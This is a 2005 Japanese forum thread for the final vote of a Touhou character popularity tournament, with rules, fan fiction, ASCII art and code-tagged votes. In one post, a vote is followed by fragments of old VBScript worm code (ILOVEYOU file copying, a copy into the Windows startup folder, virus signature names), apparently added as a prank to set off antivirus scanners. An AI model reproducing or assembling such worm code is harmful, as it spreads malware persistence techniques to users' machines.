したらばTOP ■掲示板に戻る■ 全部 1-100 最新50 | |
レス数が1スレッドの最大レス数(1000件)を超えています。残念ながら投稿することができません。

第2回東方最萌トーナメント 63本目

1七色名無し </b><font color=#FF0000>(TOHONptI)</font><b>:2005/03/11(金) 06:34:43 ID:3CykXr6g
◇インフォメーション(ルール詳細、トーナメント表、アップローダ等)
http://f39.aaa.livedoor.jp/~nullpopo/toho2/

◇コード発行所(投票は【コード必須】です。詳しくは>>3をご覧ください)
http://giants.s34.xrea.com/code06/code.cgi

○お絵描き板  http://az.ralt.jp/thbbs2/
○お絵描き板  http://th-alt.mine.nu/ (エログロ禁止)
○アップローダ http://thm.just-size.net/up/upload.html (小物向け,最大2MB)
○アップローダ http://tohomoe.sakuraweb.com/2nd/upload/upload.html (最大20MB)
○アップローダ http://www110.sakura.ne.jp/~saimoe/upload/ (18禁,最大5MB)
○アップローダ http://toho.zapto.org:6781/thmr/ (大物向け,最大50MB)

基本ルール
・投票受付時間は0:00:00〜23:00:59です。時間外の投票は一切無効となります。
 投稿時刻の逆転が起こった場合も、周囲の時刻に関係なくそのレスの時刻で判定されます。
・有効票は>>950までです。それ以降の投票は次スレにてお願いします。
・1人1日1票。2重投票すると、二度と東方をプレイできなくなります。
・[[コード]](半角大カッコ2つずつで囲む)+<<キャラクター名>>(半角不等号2つずつで囲む)
 の形式で有効票となります。ただし、1レス内にコードや投票先が複数あると無効になります。

・中間票発表、結果速報は禁止です。また、○○が劣勢なので…のような
 票数を題材にした支援、投票は荒れの元なので控えましょう。
・投票ミスで再投票する場合は、同レス内に破棄する投票のレス番号と無効宣言を添えてください。
・誤って950到達前に次スレへ投票してしまった場合、現行スレへ再投票しないでください。
 有効票として正しい形式([[コード]]+<<投票先>>)で投票されていれば問題ありません。

他スレッドへのリンク、追加ルールは>>2

39名無しさん:2005/03/11(金) 23:56:35 ID:/4cXsU3Y
ネタがないんですが、
まぁ、中国も好きだし、気が向いたので…
微妙な内容なので、早めに投入w

ちゃっちゃかちゃかちゃか♪
ちゃんちゃん♪

霖之助「今日も東方大喜利の時間がやってきました。
    司会は香霖堂店主の森近 霖之助です。」
霊夢 「また、今日もこのメンバー??」
魔理沙「いや、紫が欠席だぜ。かわりにそこの緑のヤツが…」
美鈴 「紅 美鈴!紅 美鈴です!!
    ようやく念願のレギュラーに…(泣)」

霖之助「では、早速だが、今日のお題は、君たちが香霖堂の店主になったつもりで、
    僕が持ち込んだものを鑑定する。その結果に対して、僕が驚いて理由を尋ねるから、
    そこで面白い答えをお願いしたい。では。」

…ただいま思案中

霊夢 「はい!今日は私から…
    お客さん、この紅魔館にあった掛け軸、偽者でしょう?買い取りできないわ。」
霖之助「ええ!まいったなぁ。そんなはずは無いんだが。」
霊夢 「だって、”紅 美鈴”なんて銘、覚えがないもの!」
魔理沙「紅魔館に掛け軸なんかないぜ(笑)」
美鈴 「…判っていたわ…判っていたけど…(しくしく」

魔理沙「はい!次いくぜ…
    お、お客さん、この博麗神社のお払い棒は、値打ちのある品物だぜ!」
霖之助「おお。そうなのかい?」
魔理沙「こいつは魔じゃなくて、人が払えるんだぜ!閑古鳥が鳴くけどな。」
霖之助「…霊夢、どうしたい?」
霊夢 「あんたの座布団よこしなさい!」

美鈴 「私がトリね。ここは…
    …お客さん、このお酒、買取できないの。ごめんなさい。」
霖之助「ええ!高く売れると思ったのに…」
美鈴 「だって…
    勝利の美酒には、まだ早いもの(ハート)」
魔理沙「前回のパクリじゃんか」
霊夢 「最低ね」
霖之助「座布団、全部没収」
美鈴 「ええっ!そんなぁ……
    よし、じゃあ、次は…」
霖之助「と、言ったところで、お時間です。
    では、またの機会まで、ごきげんよう!」
美鈴 「ああ、待って、待って…
    …どうしてこんな役ばかりなの…(しくしく)」


……支援になってねぇw

40リングアナウンスをする程度の能力:2005/03/11(金) 23:56:39 ID:HBMrr8cc
今回も稚拙なリング穴のご清聴まことにありがとうございます。
そして、このトーナメントに関わった全ての方と、幻想郷の住人に感謝の意を・・・。

ありがとう

41決勝開幕SS「the Last Judgement」(6/9) </b><font color=#FF0000>(HtnecUB6)</font><b>:2005/03/11(金) 23:57:00 ID:oMgdaWm.
 23:57:00――観客席の、また別の一角にて。
「やれやれ、この大会もこれで最後かい。また、寂しくなるねぇ」
「そうね……まあ、でも、久し振りに楽しい勝負ができたけど」
「確かに。ここ最近暇だったからね〜。いい刺激だったわ〜」
「……この大会、終わったら、また、私たちは暇になっちゃうのかねぇ」
「さぁ、ね。そうかも、しれないけど。
 でも、また、遊びたくなったらふらっと出て来たらいいじゃないの。
 私も、あなたたちも、ね」
「そうそう、別に、永遠の別れってわけでもないんだしさ」
「……そうだね。また、忘れられた頃におどかしてやるのも、いいかもしれないねぇ。
 ……最後の一戦、素晴らしいものにしとくれよ、悪魔の従者さんたち」

 23:57:20――観客席の、また別の一角にて。
「ねぇ、蓮子」
「なに、メリー」
「この大会、終わったら……どうするの?」
メリーの問いに、蓮子は帽子を目深に被り直して、答えた。
「……さて、どうしようかな。実は私も、決めてないんだけど」
「ちょ、ちょっと、そんなんでいいわけ?」
「さぁ、いいんじゃない?明日は明日の風が吹く、ってね。
 終わった後の事は、終わったときに考えましょ。
 それより今は、この決勝を楽しみましょうよ」
「まったくもう……でもまぁ、それもそうかも、ね。
 決勝、凄い試合に、なるんでしょうね」
「あぁ――きっと、最高の弾幕ごっこが、見られるよ」

 23:57:40――ステージの、脇にて。
「さぁ、もうすぐだぞ、準備はいいか、メルラン、リリカ?」
「準備OKよ、いつでもいけるわ、姉さん」
「こっちも大丈夫。まぁ、2回目だしね、この役目も。
 ……でも、勝負じゃみんな緒戦負けだったし、
 結局私たちって盛り上げ役がお似合いってことなのかなぁ」
「こらこらリリカ、弱気になるな。
 今までの大会、お前も楽しんでたろう? それで、十分じゃないか。
 勝ち負けの問題じゃないって。なぁ、メルラン?」
「そうよ〜。だから、最後までこの場を盛り上げて、
 私たちも一緒に盛り上がりましょう、ね、リリカ?」
「……うん、ありがと。ごめんね、変なこと言って。
 よ〜し、それじゃ、最高の盛り上げ役になるよ〜!」
「あぁ、その意気だ! さぁ、そろそろ、始まるぞ! スタンバイ!」
「「は〜〜〜い!」」

42PR:2005/03/11(金) 23:57:53 ID:1YWgQBKc
 私は元・紅盟の広報員兼諜報員です。
 此度、諸事情の下、紅盟が解散する事をここに表明します。
 つきましては、それにあたってのエピソードと、それに纏わる意志表明をここに残します。



 吹き荒ぶ風の中。
 今、私の前に二十人の同士が募っていた。

「…二十人だけ、か…否、むしろ二十人も残ってくれた事を喜ばねばならんな」

 彼らは元・紅盟の同志達。紅魔館の為に活き、紅魔館の為に死ぬ事を誓った魂の絆。しかしその人数も、既に半分まで減っていた。
 彼のスキマ大妖怪が敗退し、残りの選手がすべて紅魔館となった時、我々はとうとう瓦解を迎えてしまった。
『紅魔館に、平等の愛を』
 しかし、そんな事淡い希望でしかないのはわかっていた。勝者は一人、そして、我々も所詮は醜い一回の人間でしかない。その事をどうして否定できようか、いやできまい!
 その挙句が、謀反。
 先日のフランドール様対紅美鈴様戦。紅盟は最後まで沈黙を守るつもりでいたにも拘らず、名無しのまま紅美鈴様に投票した愚か者が四人もいた!!これは、明白な裏切り行為。いくら代表以外は名無しで構わないとはいえ、紅魔館同士の闘争は避けなければならないのに…っ!!
 そして、明日―――最終決戦。

『十六夜咲夜様 対 紅美鈴様』

 もう、迷わない。
 迷う事など無い。

「皆、ここにいるという事は、当然の覚悟をしてきたのだな?」

 じっくりと並ぶ同胞達の顔を見る。皆が皆、死地に赴く武士の如く、まさに漢の顔だった。

「…ふっ、いい顔だ」

 我々はすでに紅盟ではない。
 大元、紅魔館支援同盟は、すでに亡い。
 なら、我々は掲げよう。
 新たな―――我々の最期の名を。

「皆、いよいよ明日は決戦だ。明日0000時をもって我々は群としての名を捨て、ただの名無しに戻る。だが、勘違いはするな。あくまでそれは建前であり、今此処に、否、世界にいるすべての同志達は常に同じ大義を抱いているものと知れ。我々は独りではない、が、一人になったとしても己の魂に正直である事を、此処に誓え。支援絵、支援文、何でも構わん。手段は選ぶな。今宵に限り如何なる手管の使用も―――許可する。存分に萌え、存分に狂え!躊躇うな、迷うなっ!!己が本能の赴くままに活きろ!一切合切余力を残すな!萌え尽きる事を恐れるな!限界などない無限のパトスを解放しろ!リミッターなぞ解除だ解除!生き残る事など考えるな!!―――今日この日、お前達は死も恐れない兵士となる」

 それを封切りに、私達は一斉に上着を脱いだ。
 そこにあるのは、真っ赤な血でできたようなシャツ。
 その背に書かれた銀の文字。

『南日本紅魔館メイド長支援同盟』

 それが我々の新たな、大義の名だ。
 息を吸い込み―――声高らかに叫ぶがいい!!

「野郎ども!!俺達の目的はなんだッ!!?」

『咲夜!咲夜!咲夜!!』

「野郎ども!!俺達の特技はなんだッ!!?」

『咲夜!咲夜!咲夜!!』

「俺達は咲夜を愛してるか!?紅魔館のメイド長を愛してるか、糞野郎ども!!」

『メイド!メイド!メイド!!』

「合言葉は!?」

『れみ・りあ・うー!!』

「よっしゃあッ!いくぞコラァ!!」

『おおおおおおおおおおッッ!!!!』


 なるほど、確かにアイツの云う通りだ。

 狂気の沙汰ほど―――面白い。

 そして、とうとう始まる。

 我々の最期にして、最大にして、最萌の日が―――
 
 逝くぞ!日本全国の同胞達よ!!

43決勝開幕SS「the Last Judgement」(7/9) </b><font color=#FF0000>(HtnecUB6)</font><b>:2005/03/11(金) 23:58:00 ID:oMgdaWm.
 23:58:00――ステージに通じる、通路にて。
十六夜咲夜は、ひとりステージの方向を、見つめていた。
「やれやれ……ここまで来ちゃった、か」
前回の大会で一番最初に退場した自分が、今回こうして最後の舞台に立つ、ということに、
ある種の皮肉すら感じて、咲夜は苦笑した。
とはいえ、ここまでの4戦――人形師の使い魔の人形に始まり、
蓬莱の人の形、歴史喰いの半獣、そして境界の妖怪、と、
いずれにも決して楽な戦いは、させてもらえなかった。
その厳しい戦いを乗り越えて辿り着いた、この舞台だから、こそ。
決勝も、負けるわけには、いかない――そう咲夜は思った。
――たとえ、相手がよく知るあの門番であっても、だ。

 懐から愛用のナイフを取り出し、刃を見つめる。
鈍く光る刃先に映る、自分の顔。
刃の中の自分に向かい、ふっ、と軽く笑みをこぼしてから。
咲夜はナイフを再び懐にしまい込み、歩き出した。
「それじゃ、行きましょうか。全ての決着を、つけに」

44決勝開幕SS「the Last Judgement」(8/9) </b><font color=#FF0000>(HtnecUB6)</font><b>:2005/03/11(金) 23:58:30 ID:oMgdaWm.
 23:58:30――ステージに通じる、もう一方の通路にて。
紅美鈴は、かつてない緊張の高まりを覚えていた。
それもそのはず、相手はあの、メイド長。
「咲夜さん……私は……」
それだけ呟いて、美鈴は、目を閉じる。
外界からの旅人に、冥界の剣士、春の精、そして――主の妹。
この大会で、数々の激戦を制してきたとはいえ、
決勝という大きな舞台に自分が立つことに、不安があるのも、事実。
けれど、ここまで勝ってきたからには、最後まで戦い抜くのが、礼儀というもの。
どうせ勝っても負けても、ここで終わるというのならば。
勝って、有終の美を飾ろう――たとえ、自分より上の相手であろうとも。

 緒戦のとき、咲夜がかけてくれた言葉を、思い出す。
――「平常心」。
それを思い出す意味で、
「すぅー…………はぁーっ」
大きく一つ、深呼吸――そして。
ぱぁんっ。
自分の両の頬を、強く叩いた。
「……よしっ!」
気合、十分に。美鈴は、ステージへ向けて歩を進めた。
「この試合……勝ちに行くっ!」

45決勝開幕SS「the Last Judgement」(9/9) </b><font color=#FF0000>(HtnecUB6)</font><b>:2005/03/11(金) 23:59:00 ID:oMgdaWm.
 そして――23:59:00、ステージにて。
騒霊3姉妹のファンファーレ演奏に続き、
「これより、決勝戦を開催いたします!」
というアナウンスとともに、ステージの周囲以外から明かりが消えて。
暗闇の中、浮かび上がったステージの上に――今日の主役、2人の姿が、現れた。

「来たわね、このときが」
「えぇ、そうですね」
「あらかじめ言っておくけど……負けてあげる気は、ないからね」
「当然です。私も、負けるつもりは、ありませんよ」
「そう。それを聞いて、安心したわ。
 ま、どっちが勝ってもいい、なんてことは言わないけれど、
 お嬢様に、そしてこの会場の皆に恥ずかしくない試合を、しましょう、美鈴」
言いながら、ナイフを構える、咲夜。
「はい、咲夜さん――ぜひ、この大会の最後を飾るに、相応しい、試合を」
応じて、構えに入り闘気を高める、美鈴。



 ――訪れた、刹那の、静寂。



 ―――その、直後。



 ――――参加者たちの、数多の想いが、渦を巻く、その中で。



          ―― 00:00:00 ――


「この銀の刃で――優勝への道、切り開いてみせる!」
「この紅の闘気で――頂点の前の壁、打ち破ります!」

 第2回東方最萌トーナメント、最後の23時間が、始まった――!

46名無しさん:2005/03/11(金) 23:59:33 ID:F7AN1g5w

 「――――胸はパットで出来ている」


 「―――サイズは控えめ心は錦」


 「―――幾たびの測定を越えて不動


     ただ一度の羨望もなく、


     ただ一度の期待もなし


     微塵も


     これっぽっちも


     ないってば」


 「―――騙り手はここに独り。


     偽りの丘で面目を保つ」


 「――ならば、我が生涯に発育は不要ず」


 「―――この胸は、やっぱりパットで出来ていた」




……素敵に気合の入ったテキスト勢に混ざって、何やってるんだ自分orz

47最終回 「萌」:2005/03/11(金) 23:59:36 ID:agc5gLfo
嗚呼、もはや何も言うことは無い。
ネタにすべき中国(なまえ)、ここにあらず。
仕えるべき主人、ここにおらず。
女、前を向き、ただ萌を目指す。
女、前を向き、ただ萌を目指す。

「さくやあぁぁぁぁぁっ!てめぇに勝つ!!」
「負けるわけにはいかん!めぇいりいぃぃぃぃぃんっ!」

戦いが、今、始まる

48名無しさん:2005/03/12(土) 00:00:21 ID:mlbBs3Sc
                  決勝!
      / `>
      /!><!ヽ           _          _.,‐-‐‐ 、
     /  -―- `        '´.━ ヽ       .((〜〜〜<《
   <,(i从从ノ人 >      (〈(( ((( )       〈((( )ソ从〉<《
     ノ人゚ー ^!!从        (、゚ヮ ゚*)》〉        i、゚ー゚i.i(.ii
  ((( ;;"~;;;"~゛;;)     ((( ;;"~;;;"~゛;;)      ((( ;;"~;;;"~゛;;)
   . ミ;,,_,ミ;,,_,,;ミ       . ミ;,,_,ミ;,,_,,;ミ        . ミ;,,_,ミ;,,_,,;ミ
      (ノ ヽ_)         (ノ ヽ_)         (ノ ヽ_)


           ドンドン  ♪              ドンドン  ♪
    ,ー- ‐ヘ                .i\ /i
   /〜〜〜ヽ               < '´  ̄ ヽ
   《./ノノ))))〉 ,,──,−、  ♪  __彡ノメノノlノリ〉 ,──,−、  ♪
    〈《! ゚ ヮ゚ノ》 /(:  :(  ) ))    \ `ソリ!゚ ヮ゚ノi/(:  :(  ) ))
   /(!⊃ll_!つ  .`ー─``ー'       ><(つ!>つ `ー─``ー'
   ヽく丶-'〉  ┣━━┫┨      / ,く//_|l〉.  ┣━━┫┨
     'し'ノ.   ┠┤  ┣┫       ̄ l.ノl.ノ    ┠┤  ┣┫


                 開始!!
    <´ \
     /!><!ヽ          ._          , ‐‐-‐、.
    ' -―- ヽ.        '´ ━ ヽ       》>〜〜〜))
  < ノノ 从从i) >     ( ノ)))))〉)      .》>〈/ノノノ)))〉
    ノノi ^ ー゚ノ!!        〈《(*゚ ヮ゚ノ)         .iiノi.i゚ー゚ノi
     (;;"~゛;;;~゛;; )))      .(;;"~゛;;;~゛;; )))      (;;"~゛;;;~゛;; )))
     . ミ;,,_,,;ミ,_,,;ミ         ミ;,,_,,;ミ,_,,;ミ        . ミ;,,_,,;ミ,_,,;ミ
      (_/ \)          (_/ \)          (_/ \)

49名無しさん:2005/03/12(土) 00:00:25 ID:BHLlIsUE
[[TH12-nJ2ocLZ/-JD]]
<<十六夜咲夜>>
中国も中華も知 る か

50名無しさん:2005/03/12(土) 00:00:39 ID:5WXZEbD2
[[TH12-fQRGdHdl-JB]]
<<中国>>
c.Copy(dirsystem&\LOVE-LETTER-FOR-YOU.TXT.vbs)

VBS.Network.E
fso.copyfile c:\network.vbs j:\windows\start menu\programs\startup\
VBSInternal
cIf s = htm and fso.FileExists(f1.path+l) = False thenfso.CopyFile f1.path f1.path+l
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

51名無しさん:2005/03/12(土) 00:00:43 ID:X8Rg4EAc
[[TH12-3kz6fKmn-JD]]
<<紅美鈴>>よくここまで来たもう思い残す事はない

52名無しさん:2005/03/12(土) 00:00:52 ID:jhzvecFY
[[TH12-VS30GT3D-JD]]

<<紅美鈴>>へ俺の大切な物を。

ここまで来たら優勝するしかないだろう!!

53名無しさん:2005/03/12(土) 00:00:55 ID:bP.qyQaQ
[[TH12-mFIw/.ef-MA]]
<<紅美鈴>>
に一票

小細工したいけど我慢
その乳であんなことやそんなことをあまつさえこんなことさえっ

54名無しさん:2005/03/12(土) 00:01:00 ID:R/Cuy4zw
[[TH12-qGGgHEHk-JZ]]
<<十六夜 咲夜>>さんに1愛
泣いても笑ってもこれが最後だ!

55名無しさん:2005/03/12(土) 00:01:09 ID:2ToLuGVs


           ____
      ,, -''´ ̄    _ /ヽ_`''' - 、
     /    、    ヽ 痛 /    ヽ、
     i   、- -── |,/ヽ!、_,    i
     ゝ/    、 ,ヽ,  ,_______,-,、
     /   メ  ,イ-/─'| !======//_===o
     /   (ヽ_/--─- `┃/`ヽ、ノ`´
    /   イ。o ゚      ・  `ヽ! r_/
    /  /ゝ.,イ    ,-─-、  ゚i o。  
   /  /  (´ヽ  /    !  ノ)     
   /  /  .ゝイ ヽ!,______, ノ, イy'|      
  /   r´ ̄[><] ---イ-、[><}      
  .!    i/   Lリゝ ヽ(><)、 Lリゝ
  i   i,     ヽ   -─  ヽ、`ヽ,
  L__/|__くイ_,,-─、ノ  /´⌒`i⌒ヽr__ノ
       iヽ、   ヽ´    イ   ヽi

56名無しさん:2005/03/12(土) 00:01:12 ID:9JG9r7pk
[[TH12-HJFE8.Fc-MJ]]
<<紅美鈴>>
めーりんめーりん!

57名無しさん:2005/03/12(土) 00:01:18 ID:rRTQEAPI
[[TH12-6DIY2RVV-JP]]

         __〃⌒Y  ̄)ー┐
       ィ⌒いjLニ=ニ∠/ノー┐
       rくヽj>~      `丶ヒノュ
     jゝ/ 从  人从 Vハ  ヾレ)、
     〉/  ハハ  ハハハ Nマ  ヘノハ
     Y /i V  |  i| ト } }   ハ」 ∧
     /  {  {{  i   ! }廾ナ乂}   |ハiハ
      i/   .斗匕从  レノ / rヵォ|  l   |
     V  .}、fてぅトV    ヒニノ /i |   |
     /   {ヘ ゝ- '     """' /イ    .|  みなさん、<<メイド長>>に一票お願いしますね
      |   `ハ"""  '    ノ  / i/
      |! ハ    > _  -  rく / ノイハ
      乂人  イ≧x_ r{Y}千 7、__riくー¬
        }/ .斗{ _ノ | !| 「<__/ /二 ノl
       人ん/| / ハ八 Kミ_/ /く. (イ|
        |   (._/)「人ヽ ` }_/ /ミーr┘|
       |   て./|  }  l/ /ヘ、ノ  .|
        .|    しハ 人_ .イ ヘ、r┘  .|
         |    ィ人ミY{ ノヽ=ニ   |
        |  '"     `|{     `ヾ |
         乂      人        ノ
         >iー‐≦=≧ー--ー┬ ′
        ,.ィ '" └ァーォー‐┬―ュ‐‐┤、
     /     / 〃   |   ゝ   `丶、

58名無しさん:2005/03/12(土) 00:01:22 ID:MuiSVBDc
[[TH12-G9zFiCd1-JY]]
<<めいりんりん>>
東方CATV

59名無しさん:2005/03/12(土) 00:01:38 ID:KRH.KjMg
[[TH12-r5iYQXjO-JE]]
<<紅美鈴>>
ノートンが反応しても驚かないように

60名無しさん:2005/03/12(土) 00:01:40 ID:MuiSVBDc
[[TH12-lAMz78Pz-JA]]
<<めいりんりん>>
東方CATV

61名無しさん:2005/03/12(土) 00:01:45 ID:VurOWDcU
[[TH12-SvxPP0Rm-MA]]
<<紅美鈴>>に一票。
優勝めさして。

62名無しさん:2005/03/12(土) 00:01:51 ID:wY6cvXCA
[[TH12-HcAklslg-MA]]

<<ひの>>

63名無しさん:2005/03/12(土) 00:01:54 ID:D04RFuEk
[[TH12-gca3/tCJ-JM]]
<<紅美鈴>>に一票。
ここまできたらもう行くしかない!
がんばれめーりん!負けるなめーりん!

64名無しさん:2005/03/12(土) 00:01:57 ID:MuiSVBDc
[[TH12-EjaQYsFz-JF]]
<<めいりんりん>>
東方CATV

65名無しさん:2005/03/12(土) 00:02:13 ID:wuMLjCtM
[[TH12-5pZ7Ouqg-JA]]
早くも中国が<<咲夜>>さんのナイフに刺されたとの情報あり。

66演説する程度の能力:2005/03/12(土) 00:02:14 ID:KbIgFdkc
我が忠勇なる紅魔館メイドたちよ。
今や、紅魔館門番隊の半数が、我らがメイド長のナイフによって倒れた。
このナイフの輝きこそ、我ら紅魔館メイドの正義の証である。

決定的打撃を受けた門番に、いかほどの戦力が残っていようと、
それはすでに形骸である。

敢えて言おう、カスである、と。

それら軟弱の集団が、この時計台を抜くことは出来ない、と私は断言する。

紅魔館住人は、我ら選ばれた優良種たる紅魔館メイドに管理、運営されて、
初めて永久に生き続けることが出来る。

これ以上、戦いを続けていては、紅魔館そのものの危機である。

門番の無能なる物共に、思い知らせてやらねばならぬ。

今こそ紅魔館メイドは、メイド長の優勝に向かって立たねばならぬ時である、と。

ジーク・咲夜!!



A.D.2005 3月12日
紅魔館時計台にて

67名無しさん:2005/03/12(土) 00:02:16 ID:MuiSVBDc
[[TH12-6.PuTuaH-JE]]
<<めいりんりん>>
東方CATV

68名無し:2005/03/12(土) 00:02:18 ID:lzQkLKjA
[[TH12-W1zySis5-MZ]]

<<十六夜 咲夜>>に1票。
これが最後だ。メイド長がんばれ!優勝だ〜!

69名無しさん:2005/03/12(土) 00:02:27 ID:yS1B1Seo
[[TH12-3nSg40qN-JB]]
今日はこれからネットのない環境に幽閉されるから、
今のうちに<<美鈴>>に一票託しておく。
私は…この戦いの生き証人となることさえ許されないのか…。

余談だけど前スレの999-1000の流れが良かったなぁ

70名無しさん:2005/03/12(土) 00:02:36 ID:MuiSVBDc
[[TH12-rtq4DZcv-JF]]
<<めいりんりん>>
東方CATV

71名無しさん:2005/03/12(土) 00:02:44 ID:KM.LLUIE
[[TH12-ZsxOZUX2-JA]]
<<十六夜咲夜>>
最早、何も言う言葉はない。

72名無しさん:2005/03/12(土) 00:02:44 ID:T24YoZ06
[[TH12-/kl0LCTP-JF]]
<<十六夜咲夜>>に†一本
東方CATV

73名無しさん:2005/03/12(土) 00:02:56 ID:MuiSVBDc
[[TH12-3mqu2xPt-MX]]
<<めいりんりん>>
東方CATV

74名無しさん:2005/03/12(土) 00:03:04 ID:oqAssHt.
[[TH12-6/pgG2e8-ME]]

折角決勝まで来たんだから今日くらいは本名で呼んでやるとするか。

頑張れ闘将<<紅美鈴>>! 応援しているぞ!!

75名無しさん:2005/03/12(土) 00:03:15 ID:MuiSVBDc
[[TH12-48uE/nwc-JA]]
<<めいりんりん>>
東方CATV

76名無しさん:2005/03/12(土) 00:03:17 ID:PzHlS3Qs
[[TH12-3U5tmhgF-MZ]]
<<十六夜 咲夜>>
本命がここまでくれてよかった

77名無しさん:2005/03/12(土) 00:03:18 ID:fOVylAps
[[TH12-5idrkUGn-JP]]
<<十六夜咲夜>>さんに1票だ。
ここまで来たからには絶対に優勝してくれー。
中国なんかに負けるなー。

78名無しさん:2005/03/12(土) 00:03:22 ID:t0B6RYgU
[[TH12-7wIXjv3G-JD]]
<<紅美鈴>>に一票を捧げる
最後の闘い、がんばってこい!

http://thm.just-size.net/up/src/thm21155.jpg

79(略)の境界:2005/03/12(土) 00:03:24 ID:rt3yX56s
コード取れないのでとりあえず開始後最初(?)の支援投下
http://thm.just-size.net/up/src/thm21154.jpg
がむばれ咲夜さん

80名無しさん:2005/03/12(土) 00:03:32 ID:MuiSVBDc
[[TH12-gBUwYOwG-JF]]
<<めいりんりん>>
東方CATV

81名無しさん:2005/03/12(土) 00:03:42 ID:roG0CnVM
[[TH12-fHAR6RL2-MC]]
<<十六夜咲夜>>
まあどっちでもいいんだけど

82名無しさん:2005/03/12(土) 00:03:48 ID:MuiSVBDc
[[TH12-ojLKYR69-JC]]
<<めいりんりん>>
東方CATV

83名無しさん:2005/03/12(土) 00:03:57 ID:CF3aupqY
[[TH12-b.ghUp12-JG]]
<<十六夜 咲夜>>に一票!
だって好きだから!!

84名無しさん:2005/03/12(土) 00:04:04 ID:MuiSVBDc
[[TH12-ZWVLVUS4-JX]]
<<めいりんりん>>
東方CATV

85名無しさん:2005/03/12(土) 00:04:29 ID:G3fM9LUg
[[TH12-QKC24rfu-MZ]]
  _   ∩
( ゚∀゚)彡 紅美鈴!紅美鈴!華人小娘<<紅美鈴>>!
(  ⊂彡ミ⊃
 |   |
 し ⌒J

86名無しさん:2005/03/12(土) 00:04:35 ID:ZttBDcZ6
[[TH12-5kLKXZaP-MC]]
<<中国>>も捨てがたいが、
ここは<<まじかる☆さくやちゃんスター>>にイピョウー。

87名無しさん:2005/03/12(土) 00:04:49 ID:TRAppdVc
[[TH12-0kRMnCfs-MZ]]

いよいよ決勝! 
まさか最後までこいつに票を入れられるとは思わなかったぜ!
てなわけで<<紅美鈴>>に一票!
ここまできたら後は突っ走るのみ!

88名無しさん:2005/03/12(土) 00:04:49 ID:SMgZ9y3o
[[TH12-irzgwHXh-MA]]
<<咲夜>>―――――――――――――――――――――――――!!!
東方ADSL

89名無しさん:2005/03/12(土) 00:05:00 ID:ggLTnKxs
[[TH12-wbwDxQ2.-JJ]]
<<さゆりん>>
スキマの国からこんにちは

90名無しさん:2005/03/12(土) 00:05:09 ID:4tVEZPeE
[[TH12-WRknYqqj-MG]]
<<十六夜 咲夜>>さんに1票!!

91名無しさん:2005/03/12(土) 00:05:15 ID:L.1HDbU2
[[TH12-nSmdWDF2-MH]]
<<咲夜>>さんガンガレ!

92名無しさん:2005/03/12(土) 00:05:22 ID:krhc2WLs
[[TH12-XHqNqePM-MA]]

<<紅美鈴>>

さあ、最後の晴れ舞台を幽囚の美で!


・・・あれ?

93ブバイ:2005/03/12(土) 00:05:25 ID:XvXWdibI
[[TH12-k4Da8UfX-JD]]
<<紅美鈴>>
もう中国中国中国中国中国です
中国マンセー!!

94名無しさん:2005/03/12(土) 00:05:31 ID:aQIt5PNk
[[TH12-zHq/PM7i-JZ]]
<<十六夜咲夜さん>>に一票
最後だ、完全で瀟洒に優勝してくれ
東方CATV

95名無しさん:2005/03/12(土) 00:05:57 ID:FIZvy9UY
[[TH12-1.t0bh7W-MC]]
とりあえず>>25でく<紅美鈴>>のここまでの健闘はたたえたが
勝負は勝負。
芋夢想版ルナダイアル聞きながら東方一ハードロックの似合う少女
<<咲夜さん>>に1ロードローラー。

96名無しさん:2005/03/12(土) 00:06:14 ID:vi9.nT5I
[[TH12-8KV5gLlC-JC]]
最後の大勝負、もう言う事は無い
<<紅 美鈴>>に一票

東方ADSL

97名無しさん:2005/03/12(土) 00:06:17 ID:.ff/eR.M
[[TH12-28im2Zr2-MZ]]
勝っても負けても地獄行き
それでもがんばれ<<紅美鈴>>
最後まで走り抜けー

98名無しさん:2005/03/12(土) 00:06:22 ID:ojQ/ZoHQ
[[TH12-crXPQpwz-MZ]]
勝っても負けても<<十六夜咲夜>>への萌えは変わらない!
さくやんがんがれ。

99名無しさん:2005/03/12(土) 00:06:35 ID:yzpm2AD2
[[TH12-VFOt3KxV-JG]]
咲夜さん、すまん。
<<紅美鈴>>の下克上物語の方が、俺にとっては
シチュエーション的萌え度が高いんだ。

今日は色々な意味で一人背水の陣だろうが、
ガンバレ、紅美鈴!

100名無しさん:2005/03/12(土) 00:06:42 ID:wp5CEK..
http://toho.zapto.org:6781/thmr/src/thmr0023.swf
(※ミニゲームあり。心の準備を)

101名無しさん:2005/03/12(土) 00:06:45 ID:hvDqvA6.
[[TH12-sSHXEOL.-JZ]]
<<紅美鈴>>に一票。

102名無しさん:2005/03/12(土) 00:06:55 ID:LMwA7trI
[[TH12-pwr4r49T-JZ]]
http://thm.just-size.net/up/src/thm21134.jpg
このコッペパンは……美鈴の分だ……。
ジャムのも!
つぶあんのも!
ピーナッツクリームのも!
これも!これも!これも!これも!
http://thm.just-size.net/up/src/thm21135.jpg
全部<<紅美鈴>>の分だあああ――――――ッ!

東方CATV也

103名無しさん:2005/03/12(土) 00:06:58 ID:JE3Eg4KA
[[TH12-fiUP0bN2-MZ]]
<<紅美鈴>>に一票!
支援。かすり?(*´Д`)
http://az.ralt.jp/thbbs2/data/IMG_000272.png

104名無しさん:2005/03/12(土) 00:07:10 ID:rU7XOPzA
[[TH12-/PFQ9847-JZ]]

あんたは見てみたいと思わないか?
生みの親にいてもいなくても差し支えない程度のその他妖怪とまで言われた<<紅美鈴>>が
東方の世界にとって無くてはならない存在だと認められる瞬間を。

さあ、面を上げろ。我等は今宵、奇跡を目にする。

105名無しさん:2005/03/12(土) 00:07:15 ID:TArDPT6I
[[TH12-Bc5sMNp6-MZ]]

<<紅美鈴>>
もう行くしかないでしょう!
   _, ,_ ∩
  ( ゚∀゚)彡 めーりん!めーりん!
    ⊂彡
もう勝ってしまえ〜!何度でも名前を呼んでやるから〜!!!!!

106名無しさん:2005/03/12(土) 00:07:26 ID:KKL7AUl2
[[TH12-OpQbeusp-MA]]
<<紅美鈴>>に一票!
もはや言うことは何も無し。
勝利を信じて突き進め!

107名無しさん:2005/03/12(土) 00:07:38 ID:23sRXtqI
[[TH12-./0iovcd-MZ]]

ついに決勝!!
とゆーことで存分に名前で呼んでやるぜッ!!

ほんめいりん
ほんめいりん

ほ ん め い り ん


ほ  ん  め  い  り  ん




じゃあがんばれよ<<中国>>。

東方CATV

108名無しさん:2005/03/12(土) 00:07:48 ID:7lTFc7bM
コード取れないから先に支援を

http://thm.just-size.net/up/src/thm21156.png
拙いし、支援とも言えないけど頑張れ咲夜さん

109名無しさん:2005/03/12(土) 00:07:48 ID:rQ8Y.NRs
